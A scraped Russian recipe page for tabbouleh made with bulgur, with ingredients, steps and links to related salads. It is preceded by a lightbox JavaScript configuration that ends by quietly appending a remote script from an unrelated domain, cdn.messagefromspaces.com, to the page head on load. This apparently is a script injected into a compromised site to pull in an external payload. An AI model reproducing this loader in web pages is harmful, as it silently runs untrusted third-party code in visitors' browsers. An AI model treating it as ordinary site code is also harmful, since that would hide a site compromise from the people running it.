, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Табуле из Булгура


bulgurТабуле — это восточный салат-закуска, основным компонентом которого может быть булгур, кускус или киноа. А дальше,  дело кулинарной техники.

 

Что и сколько берем:

1. Булгур — 1 стакан

2. Перец болгарский — 1 шт.

3. Помидоры — 2 шт.

4. Зеленый лук, петрушка, мята

5. Масло оливковое

6. Сок лайма (целого)

 

Начинаем готовить:

Отвариваем булгур в подсоленной воде. Выкладываем в салатник и закидываем перечисленные ингредиенты: мелко нарезанный болгарский перец, помидоры и зелень.

Поливаем оливковым маслом и соком лайма, перчим и подсаливаем по вкусу. Ждем минут 15, чтобы салатик настоялся и приступаем к трапезе.

На эту тему вы можете почитать:

Салат из курицы с авокадо
Салат из нута
Овощной салат с авторской заправкой

Тэги: , ,



Добавить комментарий